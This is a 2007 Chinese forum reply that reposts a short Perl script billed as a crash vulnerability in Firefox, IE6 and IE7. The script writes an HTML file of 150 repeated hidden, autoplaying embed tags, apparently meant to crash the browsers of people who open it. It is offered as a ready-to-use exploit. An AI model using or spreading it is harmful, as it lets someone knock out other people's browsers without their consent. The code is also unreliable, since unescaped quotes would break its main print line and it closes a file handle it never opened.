- 在线时间
- 786 小时
- 信用度
- 4244
- 最后登录
- 2024-8-29
- 注册时间
- 2007-3-7
- 精华
- 5
- 阅读权限
- 200
- UID
- 2
|
4楼
发表于 2007-3-25 23:10:53
Mozilla,IE6,IE7 Crash 漏洞
来源:转载 发布时间:2007-3-23 0:47:25
#!/usr/bin/perl
#wenping050.cnxhacker.net
print "\nFirefox,IE6,IE7 Crash File\n";
print "Music file:";chomp($musik=<STDIN>);
open(CRASH, ">./crash.html") or die "cannot create file\n";
print CRASH "<embed src="/$musik" autostart=true loop=true hidden=true height=0 width=0>" x 150;
close(JPG);
print "Done....safed to crash.html\n"; |
|